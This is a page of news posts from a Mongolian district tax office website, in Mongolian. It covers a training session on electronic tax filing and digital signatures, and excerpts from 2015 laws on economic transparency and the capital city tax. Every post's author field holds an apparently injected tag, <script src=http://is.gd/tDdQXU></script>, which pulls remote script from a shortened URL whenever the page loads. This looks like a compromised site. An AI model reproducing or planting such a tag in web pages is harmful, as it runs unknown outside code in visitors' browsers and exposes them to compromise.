Нийслэл хотын албан татвар 2015 оны 10 сарын 01-ний өдрөөс эхлэн хэрэгжиж байна.

Сүхбаатар дүүрэг

СБД-ийн үйлчилгээ

Мэдээ мэдээлэл
ЭЭЛЖИТ СУРГАЛТАА ЗОХИОН БАЙГУУЛЛАА
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2015 оны 9-р сарын 25, Баасан гариг, 18:15

ШИНЭЭР ҮҮСГЭН БАЙГУУЛАГДСАН АЖ АХУЙН НЭГЖҮҮДЭД ЭЭЛЖИТ СУРГАЛТАА ЗОХИОН БАЙГУУЛЛАА


bma1Сүхбаатар дүүргийн Татвар төлөгчдөд үйлчлэх тасаг 2015 онд шинээр бүртгүүлсэн аж ахуйн нэгжүүдэдээ зориулан 2015 оны 09-р сарын 25-ны өдөр ААН-үүдэд зориулан Цахимаар тайлан илгээх, тоон гарын үсгийн хэрэглээ сэдвээр ээлжит сургалтаа хийлээ. Сургалтанд 21 аж ахуйн нэгж байгууллагын захирал, нягтлан бодогч, менежерүүд хамрагдлаа. Сургалтаар ААНОАТ, Цалин, хөдөлмөрийн хөлс түүнтэй адилтгах орлогын тайлангийн програм, хавсралт мэдээг шивэх, Тоон гарын үсгийн технологи, хүсэлт хэрхэн илгээх сэдвийн

Сүүлд шинэчлэгдсэн: 2015 оны 10-р сарын 06, Мягмар гариг, 10:27
Дэлгэрэнгүй...
 
ЭДИЙН ЗАСГИЙН ИЛ ТОД БАЙДЛЫГ ДЭМЖИХ ТУХАЙ
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2015 оны 9-р сарын 25, Баасан гариг, 17:18

huuli logo

МОНГОЛ УЛСЫН ХУУЛЬ
2015 оны 08 сарын 07 өдөр


ЭДИЙН ЗАСГИЙН ИЛ ТОД БАЙДЛЫГ ДЭМЖИХ ТУХАЙ

1 дүгээр зүйл.Хуулийн зорилт


1.1.Энэ хуулийн зорилт нь хувь хүн, хуулийн этгээд бусдын нэр дээр бүртгүүлсэн, нуун дарагдуулсан өөрийн өмчлөлийн хөдлөх болон үл хөдлөх эд хөрөнгө, түүнтэй адилтгах бусад хөрөнгө, олсон орлого, үзүүлсэн үйлчилгээгээ ил тод болгон үнэн зөв, шударгаар санхүү, татварын болон нийгмийн даатгалын тайланд тусгаж, шинээр тайлагнасан, гаалийн байгууллагад нөхөн мэдүүлсэн, улсын бүртгэлд шинээр бүртгүүлсэн байх ба эдгээр үйл ажиллагаа нь хувь хүн, хуулийн этгээдийн зүгээс сайн дурын үндсэн дээр хийгдсэн тохиолдолд тэдгээрийг хуульд заасан хариуцлага болон албан татвараас нэг удаа чөлөөлөхтэй холбогдсон харилцааг зохицуулахад оршино.


2 дугаар зүйл.Хуулийн үйлчлэх хүрээ


2.1.Татварын ерөнхий хууль[1], тухайн төрлийн татварын хууль болон Нийгмийн даатгалын тухай[2] хуулийн дагуу албан татвар, нийгмийн даатгалын шимтгэл төлөхөөр, Эд хөрөнгө өмчлөх эрх, түүнтэй холбоотой эд хөрөнгийн бусад эрхийн улсын бүртгэлийн тухай[3] болон Хуулийн этгээдийн улсын бүртгэлийн тухай[4] хуулийн дагуу эд хөрөнгө, үйл ажиллагаагаа улсын бүртгэлд бүртгүүлэхээр, Нягтлан бодох бүртгэлийн тухай[5] хуулийн дагуу санхүүгийн тайлан гаргахаар заасан хуулийн зохицуулалтад хамаарах хувь хүн, хуулийн этгээдэд энэ хууль үйлчилнэ.
2.2.Энэ хуулийн 3.1-д заасан хугацаанд хөрөнгө, орлогоо сайн дурын үндсэн дээр ил болгон бүртгүүлээгүй, мэдүүлээгүй, тайлагнаагүй хувь хүн, хуулийн этгээдэд энэ хууль үйлчлэхгүй.

Сүүлд шинэчлэгдсэн: 2015 оны 9-р сарын 25, Баасан гариг, 17:27
Дэлгэрэнгүй...
 
ЭДИЙН ЗАСГИЙН ИЛ ТОД БАЙДЛЫГ ДЭМЖИХ ТУХАЙ ХУУЛИЙГ ХЭРЭГЖҮҮЛЭХ ЖУРАМ
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2015 оны 9-р сарын 25, Баасан гариг, 17:15

Засгийн газрын 2015 оны 348 дугаар
тогтоолын хавсралт


ЭДИЙН ЗАСГИЙН ИЛ ТОД БАЙДЛЫГ ДЭМЖИХ
ТУХАЙ ХУУЛИЙГ ХЭРЭГЖҮҮЛЭХ ЖУРАМ


Нэг. Нийтлэг үндэслэл


1.1. Хувь хүн, хуулийн этгээд нь нуун дарагдуулсан хөрөнгө, орлого, үйл ажиллагаагаа сайн дурын үндсэн дээр ил болгон мэдүүлэх, бүртгүүлэх, тайлагнахтай холбогдсон харилцааг зохицуулахад энэхүү журмын зорилго оршино.
1.2. Хувь хүн, хуулийн этгээдийг нуун дарагдуулсан хөрөнгө, орлого, үйл ажиллагаагаа сайн дурын үндсэн дээр ил болгон мэдүүлэхэд гааль, татвар, харьяалах санхүүгийн байгууллага, нийгмийн даатгал, улсын бүртгэл болон энэ журамд заагаагүй боловч хувь хүн, хуулийн этгээдийн хөрөнгө, орлого, үйл ажиллагааг бүртгэх чиг үүрэг бүхий бусад байгууллага, албан тушаалтан (цаашид “төрийн байгууллага” гэх) зохих журмын дагуу дэмжлэг үзүүлж ажиллана.
1.3. Сангийн яам, Татварын ерөнхий газар, Гаалийн ерөнхий газар, Нийгмийн даатгалын ерөнхий газар болон Улсын бүртгэлийн ерөнхий газар нь Эдийн засгийн ил тод байдлыг дэмжих тухай хуулийг хэрэгжүүлэх үйл ажиллагааг зохион байгуулах үүрэг бүхий Ажлын хэсгийг хариуцсан асуудлынхаа хүрээнд байгуулж, нэгдсэн удирдлагаар хангаж ажиллана.
1.4. Эдийн засгийн ил тод байдлыг дэмжих тухай хуулийн 5.3-т зааснаас бусад татварыг ил болгон мэдүүлэхтэй холбогдох харилцааг энэ журмаар зохицуулахгүй.
1.5. Хувь хүн, хуулийн этгээд нуун дарагдуулсан хөрөнгө, орлого, үйл ажиллагаагаа сайн дурын үндсэн дээр ил болгон мэдүүлэх, бүртгүүлэх, тайлагнахтай холбогдуулан төлөх улсын тэмдэгтийн хураамж болон үйлчилгээний төлбөр, баримт бичгийн үнийг зохих журмын дагуу төлнө.

Дэлгэрэнгүй...
 
ТАТВАР ТЄЛЄГЧ ТАНЫГ СУРГАЛТАНД УРЬЖ БАЙНА
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2015 оны 9-р сарын 24, Пүрэв гариг, 17:19

surgalt23

 
ТАТВАРЫН АЛБАНЫ АЖИЛТНЫ ӨДРИЙН МЭНД ХЇРГЭЕ
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2015 оны 9-р сарын 14, Даваа гариг, 17:01

mendchil

 
НИЙСЛЭЛ ХОТЫН АЛБАН ТАТВАРЫН ТУХАЙ
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2015 оны 8-р сарын 12, Лхагва гариг, 17:32

huuli logo

МОНГОЛ УЛСЫН ХУУЛЬ

2015 оны 06 сарын 19 өдөр

НИЙСЛЭЛ ХОТЫН АЛБАН ТАТВАРЫН ТУХАЙ

1 дүгээр зүйл.Хуулийн зорилт

1.1.Энэ хуулийн зорилт нь нийслэл хотын албан татвар ногдуулах, уг татварыг төсөвт төвлөрүүлэх, тайлагнахтай холбогдсон харилцааг зохицуулахад оршино.

2 дугаар зүйл.Нийслэл хотын албан татварын тухай хууль тогтоомж

2.1.Нийслэл хотын албан татварын тухай хууль тогтоомж нь Татварын ерөнхий хууль[1], Төсвийн тухай хууль[2], Нийслэлийн эрх зүйн байдлын тухай хууль[3], энэ хууль болон эдгээр хуультай нийцүүлэн гаргасан хууль тогтоомжийн бусад актаас бүрдэнэ.

Сүүлд шинэчлэгдсэн: 2015 оны 8-р сарын 12, Лхагва гариг, 18:03
Дэлгэрэнгүй...
 
«ЭхлэхӨмнөх12345678910ДараахиТөгсгөл»

Хуудас 40-с 2